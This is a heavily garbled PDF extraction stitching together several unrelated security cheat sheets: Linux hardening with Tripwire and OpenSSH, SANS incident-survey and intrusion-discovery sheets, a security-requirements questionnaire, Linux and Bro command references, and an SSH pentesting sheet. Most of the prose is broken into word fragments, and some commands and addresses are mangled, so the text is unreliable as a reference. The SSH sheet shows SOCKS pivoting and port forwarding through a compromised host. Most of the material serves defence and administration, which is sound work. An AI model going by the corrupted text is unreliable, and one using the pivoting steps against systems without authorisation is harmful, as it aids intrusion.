he
fre
qu
en
cy in
wh
ich
th
e in
teg
rity
of
the
file
s a
re c
he
cke
d.
Ad
min
istr
atio
n r
eq
uir
es c
on
sta
nt
att
en
tio
n t
o t
he
syste
m c
ha
ng
es,
an
d c
an
be
tim
e-c
on
su
min
g if
use
d f
or
ma
ny
syste
ms.
Ava
ilab
le in
un
su
pp
ort
ed
co
mm
erc
ial b
ina
ry f
or
Re
d H
at
an
d s
imila
r.
# Create policy file from text file
/usr/TSS/bin/twadmin -m P policy.txt
# Initialize database according to policy file
/usr/TSS/bin/tripwire —init
# Print database
/usr/TSS/bin/twprint -m d
# Generate daily report file
/usr/TSS/bin/tripwire -m c -t 1 -M
# Update database according to policy file and report file
/usr/TSS/bin/tripwire --update --polfile policy/tw.pol \
--twrfile report/<hostname>-<date>.twr
© 2
000 G
uard
ian
Dig
ital, I
nc.
h
ttp
://w
ww
.gu
ard
ian
dig
ital.co
m
Op
en
SS
H is a
re
pla
ce
me
nt
for telnet
an
d ftp
th
at
elim
ina
tes e
ave
sd
rop
pin
g,
co
nn
ectio
n h
ijackin
g,
an
d e
ncry
pts
all
co
mm
un
ica
tio
n b
etw
ee
n h
osts
. O
ne
of
the
mo
st
ind
ep
en
sib
le f
ree
se
cu
rity
to
ols
in
exis
ten
ce
.
• In
sta
ll th
e O
pe
nS
SH
an
d O
pe
nS
SL
Pa
cka
ge
s:
openssh-<current-version>.rpm
openssh-server-<current-version>.rpm
openssh-clients-<current-version>.rpm
openssl-<current-version>.rpm
• G
en
era
te P
ub
lic/P
riva
te K
ey P
air
:
Op
en
SS
H u
se
s p
ub
lic k
ey c
ryp
tog
rap
hy t
o p
rovid
e s
ecu
re a
uth
ori
za
tio
n.
Ge
ne
ratin
g t
he
pu
blic
ke
y, w
hic
h is s
ha
red
with
re
mo
te s
yste
ms,
an
d t
he
pri
va
te
ke
y w
hic
h is k
ep
t o
n t
he
lo
ca
l syste
m,
is d
on
e f
irst
to c
on
fig
ure
Op
en
SS
H.
orion$ ssh-keygen
Generating RSA keys: ...ooooooO....ooooooO
Key generation complete.
Enter file in which to save the key (/home/dave/.ssh/identity):
Created directory '/home/dave/.ssh'.
Enter passphrase (empty for no passphrase): <passphrase>
Enter same passphrase again: <passphrase>
Your identification has been saved in /home/dave/.ssh/identity.
Your public key has been saved in /home/dave/.ssh/identity.pub.
The key fingerprint is:
ac:42:11:c8:0d:b6:7e:b4:06:6a:a3:a7:e8:2c:b0:12 dave@orion
• C
op
y P
ub
lic K
ey t
o R
em
ote
Ho
st:
host2$ mkdir -m 700 ~dave/.ssh
host2$ cp /mnt/floppy/identity.pub ~dave/.ssh/authorized_keys
• L
og
in
to
Re
mo
te H
ost:
Th
e S
SH
clie
nt
(/usr/bin/ssh
) is
a d
rop
-in
re
pla
ce
me
nt
for rlogin
an
d rsh
. It
ca
n b
e u
se
d t
o s
ecu
rely
lo
gin
to
a r
em
ote
ho
st:
orion$ ssh host2
Enter passphrase for RSA key 'dave@orion': <passphrase>
Last login: Sat Aug 15 17:13:01 2000 from orion
No mail.
host2$
• C
op
y F
iles t
o R
em
ote
Ho
st:
Th
e O
pe
nS
SH
pa
cka
ge
als
o in
clu
de
s scp
, a
se
cu
re a
nd
im
pro
ve
d r
ep
lace
me
nt
for
rcp
. T
his
allo
ws y
ou
to
se
cu
rely
co
py f
iles o
ve
r a
ne
two
rk.
orion$ scp /tmp/file.tar.gz host2:/tmp
Enter passphrase for RSA key 'dave@orion:
file.tar.gz 100% |***************************| 98304 00:00
It is a
lso
po
ssib
le to
en
ca
psu
late
ord
ina
rily
in
se
cu
re p
roto
co
ls s
uch
as IM
AP
an
d
PO
P w
ith
in S
SH
to
pre
ve
nt
tra
nsm
ittin
g c
lea
r te
xt
pa
ssw
ord
s t
o y
ou
r m
ail
se
rve
r .
Ad
ditio
na
lly,
the
rsync
in
cre
me
nta
l file
tra
nsfe
r u
tilit
y c
an
use
SS
H t
o s
ecu
rely
syn
ch
ron
ize
tw
o h
osts
or
ba
cku
p d
ata
to
a lo
g s
erv
er
se
cu
rely
. S
SH
ca
n e
ve
n b
e
use
d t
o s
ecu
rely
co
nn
ect
two
su
bn
ets
acro
ss t
he
In
tern
et,
effe
ctive
ly c
rea
tin
g a
vir
tua
l p
riva
te n
etw
ork
. D
isa
ble
re
mo
te r
oo
t lo
gin
s a
nd
em
tpy p
assw
ord
ab
ility
.
•
Acce
ss w
ill b
e g
ran
ted
wh
en
a d
ae
mo
n/c
lien
t p
air
ma
tch
es a
n e
ntr
y in
the
/etc/hosts.allow
file
.
•
Oth
erw
ise
, a
cce
ss w
ill b
e d
en
ied
wh
en
a d
ae
mo
n/c
lien
t p
air
ma
tch
es
an
en
try in
th
e /etc/hosts.deny
file
.
•
Oth
erw
ise,
acce
ss w
ill b
e g
rante
d.
A n
on
-exis
tin
g a
cce
ss c
on
tro
l file
is t
rea
ted
as if
it w
ere
an
em
pty
file
. T
hu
s,
acce
ss c
on
tro
l w
ill b
e t
urn
ed
of f if
no
acce
ss c
on
tro
l file
s a
re p
rese
nt!
Dis
ab
le U
nn
ecessary
Serv
ices:
Ap
ach
e S
ecu
rity
:
Co
nfi
gu
rin
g T
CP
Wra
pp
ers
:
Co
nfi
gu
rin
g S
yslo
g:
Ins
tall
an
d C
on
fig
ure
Tri
pw
ire
:
DN
S S
ecu
rity
:U
sin
g R
PM
an
d d
pk
g:
Insta
ll a
nd
Co
nfi
gu
re O
pen
SS
H:
Ch
eckin
g P
ackag
e I
nte
gri
ty:
Cri
tical
Syste
m F
iles:
Dis
ab
ling
o
r re
mo
vin
g u
nu
se
d p
rog
ram
s a
nd
se
rvic
es f
rom
yo
ur
ho
st
is t
he
mo
st
eff
ective
wa
y t
o lim
it t
hre
ats
ori
gin
atin
g f
rom
a r
em
ote
ho
st.
Use
yo
ur
dis
trib
utio
ns
pa
cka
ge
ma
na
ge
me
nt
too
ls t
o s
ca
n t
he
lis
t o
f in
sta
lled
pa
cka
ge
s,
the
n r
em
ove
tho
se
th
at a
re u
nn
ece
ssa
ry.
• M
an
y o
f th
e s
erv
ice
s r
un
nin
g f
rom
inetd
are
le
gacy p
rogra
ms,
whic
h a
re h
ard
ly
eve
r re
qu
ire
d,
ye
t ty
pic
ally
en
ab
led
by d
efa
ult.
Th
e f
ile /etc/inetd.conf
is
use
d t
o s
pe
cify w
hic
h s
erv
ice
s a
re o
ffe
red
. D
isa
ble
all
se
rvic
es t
ha
t yo
u d
o n
ot
wa
nt
to p
rovid
e b
y c
om
me
ntin
g t
he
m o
ut
usin
g t
he
# c
ha
racte
r in
th
e f
irst
co
lum
n
of
the
lin
e.
• T
he
/etc/rc*.d
or /etc/rc.d/rc*
dir
ecto
rie
s c
on
tain
s s
he
ll scri
pts
th
at
co
ntr
ol th
e e
xe
cu
tio
n o
f n
etw
ork
an
d s
yste
m s
erv
ice
s d
uri
ng
ru
nle
ve
ls.
Re
na
me
or
oth
erw
ise
dis
ab
le a
ny t
ha
t a
re n
ot
req
uir
ed
or
rem
ove
th
e p
acka
ge
en
tire
ly.
Re
d
Ha
t u
se
rs c
an
use
/sbin/chkconfig --list
to lis
t w
hic
h s
erv
ices r
un in w
hic
h
run
leve
l, a
nd
/sbin/chkconfig --del <name>
to
dis
ab
le a
se
rvic
e.
If y
ou
do
n’t u
nd
ers
tan
d w
ha
t a
pa
rtic
ula
r se
rvic
e d
oe
s,
dis
ab
le it
un
til yo
u f
ind
ou
t.
Use
netstat
an
d ps
to
co
nfirm
th
ey h
ave
no
t b
ee
n s
tart
ed
aft
er
a r
eb
oo
t. U
se
/bin/netstat -a -p --inet
to
de
term
ine
wh
ich
are
ava
ilab
le a
nd
th
e
pro
ce
ss ID
asso
cia
ted
with
th
em
. A
po
rt s
ca
nn
er
sh
ou
ld a
lso
be
use
d to
ge
t a
vie
w
of w
ha
t re
mo
te h
osts
se
e.
75
SECURITY
INCIDENT
SURVEY
CHEAT
SHEET
FOR
SERVER
ADMINISTRATORS
Tips for examining
a suspect
system
to decide
whether to
escalate
for form
al incident response.
Assessing
the
Suspicious Situation
To
retain
attacker’s footprints, avoid
taking
actions that
access
many files or installing
tools.
Look
at system, security, and
application
logs for
unusual events.
Look
at n
etw
ork
configuration
details and
connections;
note
anomalous settings,
sessions or ports.
Look
at the
list
of u
sers
for accounts
that d
o not b
elong
or should
have
been
disabled.
Look
at a
listing
of running
processes or scheduled
jobs
for those
that d
o not b
elong
there.
Look
for u
nusual programs configured
to run
automatically
at system’s
start
time.
Check
ARP
and
DNS
settings;
look
at contents
of the
hosts file
for entries that d
o not b
elong
there.
Look
for u
nusual files and
verify
integrity
of O
S and
application
files.
Use
a netw
ork
sniffer,
if present o
n th
e system
or
available
externally, to
observe
for unusual activity.
A rootkit
might conceal the
compromise
from
tools;
trust
your instincts if
the
system
just
doesn’t
feel right.
Examine
recently
‐reported
problems,
intrusion
detection
and
related
alerts for the
system.
If You
Believe
a Compromise
is Likely...
Involve
an
incident response
specialist
for n
ext
steps,
and
notify
your manager.
Do
not p
anic
or let o
thers
rush
you; concentrate
to
avoid
making
careless
mistakes.
If stopping
an
on
‐going
attack, unplug
the
system
from
the
netw
ork; do
not reboot o
r power down.
Take
thorough
notes to
track
what you
observed, w
hen,
and
under what circumstances.
Windows Initial S
ystem
Examination
Look
at e
vent logs
eventvwr
Examine
netw
ork
configuration
arp –
a,
netstat –
nr
List
netw
ork
connections and
related
details
netstat –
nao,
netstat –
vb,
net s
ession, net u
se
List
users
and
groups
lusrmgr, n
et users,
net l
ocalgroup a
dministrators,
net g
roup a
dministrators
Look
at scheduled
jobs
schtasks
Look
at a
uto
‐start
programs
msconfig
List
processes
taskmgr,
wmic p
rocess l
ist f
ull
List
services
net s
tart,
tasklist /svc
Check
DNS
settings and
the
hosts file
ipconfig /all,
ipconfig /
displaydns,
more %
SystemRoot%\
System32\Drivers\etc\hosts
Verify
integrity
of O
S files
(affects lots
of files!)
sigverif
Research
recently
‐modified
files (affects lots
of files!)
dir
/a/o‐d
/p
%SystemRoot%\
System32
Avoid
using
Windows Explorer,
as it
modifies useful file
system
details;
use
command
‐line.
Unix
Initial S
ystem
Examination
Look
at e
vent log
files
in
directories (locations vary)
/var/log,
/var/adm,
/var/spool
List
recent security
events
wtmp, w
ho,
last, l
astlog
Examine
netw
ork
configuration
arp –
an,
route p
rint
List
netw
ork
connections and
related
details
netstat –
nap
(Linux),
netstat –
na
(Solaris),
lsof –
i
List
users
more /
etc/passwd
Look
at scheduled
jobs
more /
etc/crontab,
ls /
etc/cron.*,
ls /
var/at/jobs
Check
DNS
settings
and
the
hosts file
more /
etc/resolv.conf,
more /
etc/hosts
Verify
integrity
of installed
packages (affects lots
of files!)
rpm ‐
Va
(Linux),
pkgchk
(Solaris)
Look
at a
uto
‐start
services
chkconfig ‐
‐list
(Linux),
ls /
etc/rc*.d
(Solaris),
smf
(Solaris 10+)
List
processes
ps a
ux
(Linux,
BSD),
ps ‐
ef (Solaris),
lsof +
L1
Find
recently
‐modified
files
(affects lots
of files!)
ls –
lat /
, find /
‐mtime ‐
2d ‐
ls
Incident Response
Communications
Do
not share
incident d
etails with
people
outside
the
team
responding
to th
e incident.
Avoid
sending
sensitive
data
over email
or instant
messenger without e
ncryption.
If you
suspect
the
netw
ork
was compromised,
communicate
out‐of‐band, e.g. non
‐VoIP
phones.
Key
Incident Response
Steps
1.
Preparation: G
ather and
learn
the
necessary
tools,
become
familiar with
your environment.
2.
Identification: D
etect
the
incident,
determ
ine
its
scope, and
involve
the
appropriate
parties.
3.
Containment:
Contain
the
incident to
minim
ize
its
effect
on
neighboring
IT resources.
4.
Eradication: Eliminate
compromise
artifacts,
if
necessary, on
the
path
to recovery.
5.
Recovery: R
estore
the
system
to norm
al
operations,
possibly
via
reinstall
or backup.
6.
Wrap
‐up: D
ocument the
incident’s details,
retail
collected
data, and
discuss
lessons learned.
Other Incident Response
Resources
Windows Intrusion
Discovery
Cheat S
heet
http://sans.org/resources/winsacheatsheet.pdf
Checking
Windows for Signs of C
ompromise
http://w
ww.ucl.ac.uk/cert/w
in_intrusion.pdf
Linux Intrusion
Discovery
Cheat S
heet
http://sans.org/resources/linsacheatsheet.pdf
Checking
Unix/Linux for S
igns of C
ompromise
http://w
ww.ucl.ac.uk/cert/nix_intrusion.pdf
Authored
by
Lenny
Zeltser,
who
leads a
security
consulting
team
at S
AVVIS, and
teaches malware
analysis at S
ANSInstitute. Special thanksfor feedback
toLorna
Hutcheson, Patrick
Nolan, R
aul Siles,
Ed
Skoudis, D
onald
Smith, Koon
Yaw
Tan, G
erard
White, and
Bojan
Zdrnja.Creative
Commons v3
“Attribution” License
for this
cheat sheet v. 1.7.More
cheat sheets?
76
Authored
by
Lenny
Zeltser,
who
leads the
security
consulting
practice
at S
avvis
and
teaches at SANS
Institute. You
can
find
him
on
Twitter.
Special thanksto
Slava
Fridfor feedback. Page
2 of 2
. Creative
Commons v3
“Attribution” License
for this
cheat sheet version
1.1. See
Lenny’s
othercheat sheets.
Which
personnel oversees security
processes and
requirements
related
to th
e application?
What e
mployee
initiation
and
term
ination
procedures have
been
defined?
What controls
exist
to protect
a compromised
in th
e
corporate
environment from
affecting
production?
What security
governance
requirements
have
been
defined?
ISO
27002
Standard: C
ode
of P
ractice
http://w
ww.iso.org/iso/catalogue...
BITS
Standards for Vendor A
ssessments
http://w
ww.sharedassessments.org/download...
Payment C
ard
Industry
(PCI)
Data
Security
Standard
https://www.pcisecuritystandards.org/security...
IT Infrastructure
Threat M
odeling
Guide
http://w
ww.m
icrosoft.com/downloads...
What security
training
do
developers
and
administrators
undergo?
What a
pplication
requirements
impose
the
need
to
enforce
the
principle
of separation
of d
uties?
Guidance
for C
ritical A
reas ... in
Cloud
Computing
http://w
ww.cloudsecurityalliance.org/guidance...
How
to W
rite
an
Inform
ation
Security
Policy
http://w
ww.csoonline.com/article/print/495017
What corporate
security
program
requirements
have
been
defined?
OWASP
Guide
to Building
Secure
Web
Applications
http://w
ww.owasp.org/index.php/O
WASP_Guide...
Page
2 of 2
What secure
coding
processes have
been
established?
Additional R
esources
Corporate
What staging, testing, and
Quality
Assurance
requirements
have
been
defined?
What a
ccess
to system
and
netw
ork
administrators
have
to th
e application’s
sensitive
data?
What security
incident requirements
have
been
defined?
What p
hysical controls
restrict
access
to th
e
application’s
components
and
data?
What is the
process
for g
ranting
access
to th
e
environment h
osting
the
application?
What m
echanisms exist
to detect
violations of
change
management p
ractices?
How
do
developers
assist w
ith
troubleshooting
and
debugging
the
application?
What requirements
have
been
defined
for
controlling
access
to th
e applications source
code?
What is the
process
for identifying
and
addressing
vulnerabilities in
netw
ork
and
system
components?
How
do
administrators
access
production
infrastructure
to m
anage
it?
How
are
changes to
the
infrastructure
controlled?
What is the
process
for identifying
and
addressing
vulnerabilities in
the
application?
What d
ata
is available
to developers
for testing?
#4: SECURITY
PROGRAM
REQUIREMENTS
How
are
changes to
the
code
controlled?
How
is code
deployed
to production?
Software
Development
Change
Management
Operations
What u
ser identification
and
authentication
requirements
have
been
defined?
What session
management requirements
have
been
defined?
What a
pplication
perform
ance
monitoring
requirements
have
been
defined?
What a
pplication
security
monitoring
requirements
have
been
defined?
What a
pplication
error h
andling
and
logging
requirements
have
been
defined?
How
many
logical tiers
group
the
application's
components?
What a
ccess
requirements
have
been
defined
for URI
and
Service
calls?
What u
ser a
uthorization
requirements
have
been
defined?
How
are
user identities maintained
throughout
transaction
calls?
How
are
audit
and
debug
logs accessed, stored, and
secured?
How
is interm
ediate
or in
‐process
data
stored
in th
e
application
components’ m
emory
and
in cache?
What a
pplication
design
review
practices have
been
defined
and
executed?
What a
pplication
auditing
requirements
have
been
defined?
What u
ser a
ccess
restrictions have
been
defined?
What u
ser p
rivilege
levels
does the
application
support?
Application
Monitoring
Application
Design
Access
77
Linux Commands Getting around Command Descrip/on cd logs Move to the logs directory, which is located in the current directory. cd /logs Move to the logs directory, which is located in the top-‐level directory. cd .. Move up one directory. cd ~ Move to your home directory (the “:lde” character is le< of the 1 key). cd - Move to the directory you were previously in.
Command Descrip/on cat data.txt Display data.txt cat *.txt Display all files that end with .txt head data.txt Display the first 10 lines of data.txt. head –n 20 data.txt Display the first 20 lines of data.txt. tail data.txt Display the last 10 lines of data.txt. tail –n 30 data.txt Display the last 20 lines of data.txt. tail –F data.txt Display the last 10 lines of data.txt and con:nue
running, displaying any new lines in the file. Note: Press Ctrl+C to exit.
grep malware data.txt Display all lines in data.txt that contain ‘malware’.
grep –v malware data.txt Display all lines that do not contain ‘malware’.
grep ‘mal ware’ data.txt To search for phrases with spaces, use single quotes.
grep –F 1.2.3.4 data.txt To search for phrases with periods, use –F grep –c exe data.txt Display how many lines in data.txt contain
‘exe’ (but don’t display them). grep –F –c 1.2.3.4 *.txt Display the number of lines with IP 1.2.3.4 in
each file that ends in .txt. less large.file Display large.file in less (see right). less –S large.file Display large.file in less (see right), and allow for
side-‐to-‐side scrolling.
Viewing and searching in files Key or Command Descrip/on
q Quit
Up/down arrow Move up/down one line.
Left/right arrow Move le</right half of a page. Note: requires less –S
Page up/down Move up/down one page.
g Go to the first line
G Go to the last line
F Go to the last line, and display any new lines (similar to tail –F). Note: Press Ctrl+C to exit.
/malware Search -‐ go to the next line containing the word ‘malware.’
/!malware Search – go to the next line NOT containing the word ‘malware.’
?malware Search – go to the previous line containing the word ‘malware.’
n Repeat a previous search.
N Repeat a previous search, but in the opposite direc:on.
Navigating in less
Tip – Tab Comple/on Use tab comple/on to type filenames faster. As you’re typing a filename (or directory), hit the tab key. If there’s only one file that matches what you’ve typed, the rest of the filename will be filled in. If nothing happens when you hit tab, simply hit tab again to see a list of matches.
Command Descrip/on | (AKA “pipe”) Pass the output of one command to another command.
Note: For the “pipe” character, use the key above enter (same key as backslash). grep malware data.txt | tail –n 30 Display the last 30 lines in data.txt that contain the word ‘malware.’ grep malware data.txt | grep blaster Display lines in data.txt that contain ‘malware’ and also contain ‘blaster.’ cat data.txt | sort Display data.txt, sorted alphabe:cally. cat data.txt | sort | uniq Display data.txt, sorted alphabe:cally, with duplicates removed. cat data.txt | sort | uniq –c Sort, remove duplicates, and display the number of :mes each line occurred. cat data.txt | sort | uniq –c | sort –n Sort, remove duplicates, and display the most frequent lines. è cat data.txt | sort | uniq –c | sort –n | tail –n 20 Sort, remove duplicates, and display the 20 most frequent lines. cat conn.log | bro-cut id.resp_h proto service Only display the id.resp_h, proto and service columns of the conn Bro log. cat http.log | bro-cut –d ts method host uri Only display the :mestamp, method, host and uri columns, and convert the
/mestamp to human-‐readable format.
Putting it all together
Tip – Compressed Files Files that end in .gz are compressed, and might require some different commands:
Command Modifica/on for .gz
cat or grep Use zcat or zgrep.
head or tail Use zcat | head or zcat | tail
Tip – Working With Big Files Commands take longer to run on larger files. Some things to keep in mind are: • Use grep –F instead of plain grep. • For viewing the file, use less instead of cat. • Try to use grep as early as possible, so if
you pipe to other tools, there’s less data to crunch.
Tip – Documenta/on Linux commands are all well documented. To view the documenta:on: • Run the command with -‐-‐help (e.g. tail
-‐-‐help) to see the op:ons. • Use the manual pages for more detail
(e.g. man tail). Note: these open in less.
In order to promote its wide distribu:on, this work is licensed under the Crea:ve Commons Abribu:on-‐NonCommercial-‐ShareAlike 4.0 Interna:onal License (hbp://crea:vecommons.org/licenses/by-‐nc-‐sa/4.0/). We at Broala are commibed to helping you understand Bro to the fullest so you can be a monitoring hero.
© Broala LLC. 6578
Basic Linux Commands SYSTEM uname -a =>Displaylinux system information uname -r =>Display kernel release information uptime =>Show how long the system has been running + load hostname =>Show system host name hostname -i =>Display the IP address of the host last reboot =>Show system reboot history date =>Show the current date and time cal =>Show this month calendar w =>Display who is online whoami =>Who you are logged in as finger user =>Display information about user HARDWARE dmesg =>Detected hardware and boot messages cat /proc/cpuinfo =>CPU model cat /proc/meminfo =>Hardware memory cat /proc/interrupts =>Lists the number of interrupts per CPU per I/O device lshw =>Displays information on hardware configuration of the system lsblk =>Displays block device related information in Linux free -m =>Used and free memory (-m for MB) lspci -tv =>Show PCI devices lsusb -tv =>Show USB devices dmidecode =>Show hardware info from the BIOS hdparm -i /dev/sda =>Show info about disk sda hdparm -tT /dev/sda =>Do a read speed test on disk sda badblocks -s /dev/sda =>Test for unreadable blocks on disk sda USERS id =>Show the active user id with login and group last =>Show last logins on the system who =>Show who is logged on the system groupadd admin =>Add group "admin" useradd -c "Sam" =>g admin -m sam #Create user "sam" userdel sam =>Delete user sam adduser sam =>Add user "sam" usermod =>Modify user information chgrp => Changes a users group FILE COMMANDS ls –al =>Display all information about files/ directories pwd =>Show the path of current directory mkdir directory-name =>Create a directory rm file-name =>Delete file rm -r directory-nam =>Delete directory recursively rm -f file-name =>Forcefully remove file rm -rf directory-name =>Forcefully remove directory recursively cp file1 file2 =>Copy file1 to file2 cp -r dir1 dir2 =>Copy dir1 to dir2, create dir2 if it doesn’t exist mv file1 file2 =>Rename source to dest / move source to directory ln –s /path/to/file-name link-name #Create symbolic link to file-name touch file =>Create or update file cat > file =>Place standard input into file more file =>Output contents of file head file =>Output first 10 lines of file tail file =>Output last 10 lines of file tail -f file =>Output contents of file as it grows starting with the last 10 lines gpg -c file =>Encrypt file gpg file.gpg =>Decrypt file wc =>print the number of bytes, words, and lines in files xargs =>Execute command lines from standard input PROCESS RELATED ps =>Display your currently active processes ps aux | grep 'telnet' =>Find all process id related to telnet process pmap =>Memory map of process top =>Display all running processes kill pid =>Kill process with mentioned pid id killall proc =>Kill all processes named proc pkill process-name =>Send signal to a process with its name bg =>Resumes suspended jobs without bringing them to foreground fg =>Brings the most recent job to foreground fg n =>Brings job n to the foreground
FILE PERMISSION RELATED chmod octal file-name =>Change the permissions of file to octal Example chmod 777 /data/test.c =>Set rwx permission for owner,group,world chmod 755 /data/test.c =>Set rwx permission for owner,rx for group and world chown owner-user file =>Change owner of the file chown owner-user:owner-group file-name =>Change owner and group owner of the file chown owner-user:owner-group directory =>Change owner and group owner of the directory
NETWORK ip addr show =>Display all network interfaces and ip address ip address add 192.168.0.1 dev eth0 =>Set ip address ethtool eth0 =>Linux tool to show ethernet status mii-tool eth0 =>Linux tool to show ethernet status ping host =>Send echo request to test connection whois domain =>Get who is information for domain dig domain =>Get DNS information for domain dig -x host =>Reverse lookup host host google.com =>Lookup DNS ip address for the name hostname –i =>Lookup local ip address wget file =>Download file netstat -tupl =>Listing all active listening ports COMPRESSION / ARCHIVES tar cf home.tar home =>Create tar named home.tar containing home/ tar xf file.tar =>Extract the files from file.tar tar czf file.tar.gz files =>Create a tar with gzip compression gzip file =>Compress file and renames it to file.gz INSTALL PACKAGE rpm -i pkgname.rpm =>Install rpm based package rpm -e pkgname =>Remove package INSTALL FROM SOURCE ./configure make make install SEARCH grep pattern files =>Search for pattern in files grep -r pattern dir =>Search recursively for pattern in dir locate file =>Find all instances of file find /home/tom -name 'index*' =>Find files names that start with "index" find /home -size +10000k =>Find files larger than 10000k in /home LOGIN (SSH AND TELNET) ssh user@host =>Connect to host as user ssh -p port user@host =>Connect to host using specific port telnet host =>Connect to the system using telnet port FILE TRANSFER sftp 192.16875.2 =>Connect remote host scp scp file.txt server2:/tmp =>Secure copy file.txt to remote host /tmp folder rsync rsync -a /home/apps /backup/ =>Synchronize source to destination DISK USAGE df –h =>Show free space on mounted filesystems df -i =>Show free inodes on mounted filesystems fdisk -l =>Show disks partitions sizes and types du -ah =>Display disk usage in human readable form du -sh =>Display total disk usage on the current directory findmnt =>Displays target mount point for all filesystem mount device-path mount-point =>Mount a device DIRECTORY TRAVERSE cd .. =>To go up one level of the directory tree cd =>Go to $HOME directory cd /test =>Change to /test directory
6679
SSH Cheat Sheet SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features. NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.
SOCKS Proxy Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): Command line: ssh -D 127.0.0.1:1080 10.0.0.1
~/.ssh/config: Host 10.0.0.1
DynamicForward 127.0.0.1:1080
You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: tsocks rdesktop 10.0.0.2
Local Forwarding Make services on the remote network accessible to your host via a local listener. NB: Remember that you need to be root to bind to TCP port <1024. Higher ports are used in the examples below.
Example 1 The service running on the remote host on TCP port 1521 is accessible by connecting to 10521 on the SSH client system. Command line: ssh -L 127.0.0.1:10521:127.0.0.1:1521 [email protected]
~/.ssh/config: LocalForward 127.0.0.1:10521 127.0.0.1:1521
Example 2 Same thing, but other hosts on the same network as the SSH client can also connect to the remote service (can be insecure).
Command line:
ssh -L 0.0.0.0:10521:127.0.0.1:1521 10.0.0.1
~/.ssh/config:
LocalForward 0.0.0.0:10521 127.0.0.1:1521
80
Look in /
etc
/pass
wd f
or
new
acc
ounts
in s
ort
ed lis
t by
UID
:
# sort –nk3 –t: /etc/passwd | less
Norm
al acc
ounts
will
be t
here
, but
look f
or
new
,
unexpect
ed a
ccounts
, esp
eci
ally
with U
ID <
500.
Als
o, lo
ok for
unexpect
ed U
ID 0
acc
ounts
: # egrep ':0+:' /etc/passwd
On s
yste
ms
that
use
multip
le a
uth
entica
tion m
eth
ods:
# getent passwd | egrep ':0+:'
Look f
or
orp
haned f
iles,
whic
h c
ould
be a
sig
n o
f an
att
ack
er's
tem
pora
ry a
ccount
that
has
been d
ele
ted.
# find / -nouser -print
Syst
em
Adm
inis
trato
rs a
re o
ften o
n t
he f
ront
lines
of
com
pute
r se
curity
. This
guid
e a
ims
to s
upport
Syst
em
Adm
inis
trato
rs in f
indin
g
indic
ations
of
a s
yst
em
com
pro
mis
e.
The follo
win
g t
ools
are
oft
en n
ot
built
into
the
Lin
ux o
pera
ting s
yst
em
, but
can b
e u
sed t
o
analy
ze its
secu
rity
sta
tus
in m
ore
deta
il.
Each
is
availa
ble
for
free d
ow
nlo
ad a
t th
e
liste
d w
eb s
ite.
DIS
CLA
IME
R:
Th
e S
AN
S I
nsti
tute
is n
ot
resp
on
sib
le f
or
cre
ati
ng
, d
istr
ibu
tin
g,
wa
rra
nti
ng
, o
r su
pp
ort
ing
an
y o
f th
e
foll
ow
ing
to
ols
.
Chkro
otk
it looks
for
anom
alie
s on s
yst
em
s
intr
oduce
d b
y u
ser-
mode a
nd k
ern
el-m
ode
RootK
its
– w
ww
.chkro
otk
it.o
rg
Tripw
ire looks
for
changes
to c
ritica
l sy
stem
file
s – w
ww
.tripw
ire.o
rg -
fre
e for
Lin
ux for
non-c
om
merc
ial use
AID
E looks
for
changes
to c
ritica
l sy
stem
file
s
htt
p:/
/ww
w.c
s.tu
t.fi/~
ram
mer/
aid
e.h
tml
The C
ente
r fo
r In
tern
et
Secu
rity
has
rele
ase
d
a L
inux h
ard
enin
g g
uid
e for
free a
t
ww
w.c
isecu
rity
.org
. The fre
e B
ast
ille S
crip
t pro
vid
es
auto
mate
d
secu
rity
hard
enin
g f
or
Lin
ux s
yst
em
s,
availa
ble
at
ww
w.b
ast
ille-lin
ux.o
rg.
Un
us
ua
l A
cc
ou
nts
Ad
dit
ion
al
Su
pp
ort
ing
To
ols
Pu
rpo
se
Wh
at
to u
se
th
is s
he
et
for
On a
periodic
basi
s (d
aily
, w
eekly
, or
each
tim
e y
ou
logon t
o a
syst
em
you m
anage,)
run t
hro
ugh t
hese
quic
k s
teps
to look f
or
anom
alo
us
behavio
r th
at
mig
ht
be c
ause
d b
y a
com
pute
r in
trusi
on. Each
of
these
com
mands
runs
loca
lly o
n a
syst
em
.
Th
is s
he
et
is s
pli
t in
to t
hese
se
cti
on
s:
• U
nusu
al Pro
cess
es
and S
erv
ices
• U
nusu
al File
s
• U
nusu
al N
etw
ork
Usa
ge
• U
nusu
al Sch
edule
d T
ask
s •
Unusu
al Acc
ounts
• U
nusu
al Log E
ntr
ies
• O
ther
Unusu
al It
em
s •
Additio
nal Support
ing T
ools
In
tru
sio
n D
isc
ove
ry
Ch
eat S
heet v2.0
Lin
ux
PO
CK
ET
REFER
EN
CE G
UID
E
SA
NS
In
stit
ute
w
ww
.san
s.or
g an
d is
c.sa
ns.o
rg
Dow
nloa
d th
e la
test
ver
sion
of t
his
shee
t fro
m
http
://w
ww
.san
s.or
g/re
sour
ces/
linsa
chea
tshe
et.p
df
If y
ou
sp
ot
an
om
alo
us b
eh
av
ior:
DO
NO
T P
AN
IC!
Yo
ur
syste
m m
ay o
r m
ay n
ot
ha
ve
co
me
un
de
r a
tta
ck.
Ple
ase
co
nta
ct
the
In
cid
ent
Ha
ndlin
g T
ea
m
imm
ed
iate
ly to
rep
ort
th
e a
ctivitie
s a
nd
get
furt
he
r
assis
tan
ce
.
Look t
hro
ugh y
our
syst
em
log f
iles
for
susp
icio
us
events
, in
cludin
g:
"ente
red p
rom
iscu
ous
mode"
Larg
e n
um
ber
of
auth
entica
tion o
r lo
gin
fa
ilure
s fr
om
either
loca
l or
rem
ote
acc
ess
tools
(e.g
., t
eln
etd
, ss
hd, etc
.)
Rem
ote
Pro
cedure
Call
(rpc)
pro
gra
ms
with a
log e
ntr
y t
hat
incl
udes
a larg
e n
um
ber
(> 2
0)
stra
nge c
hara
cters
(su
ch a
s ^
PM
-^PM
-^PM
-^
PM
-^PM
-^PM
-^PM
-^PM
)
For
syst
em
s ru
nnin
g w
eb s
erv
ers
: Larg
er
than
norm
al num
ber
of
Apach
e logs
sayin
g "
err
or"
Reboots
and/o
r applic
ation r
est
art
s
Un
us
ua
l L
og
En
trie
s
Oth
er
Un
us
ua
l It
em
s
Slu
ggis
h s
yst
em
perf
orm
ance
:
$ uptime
– L
ook a
t "load a
vera
ge"
Exce
ssiv
e m
em
ory
use
: $ free
Sudden d
ecr
ease
s in
availa
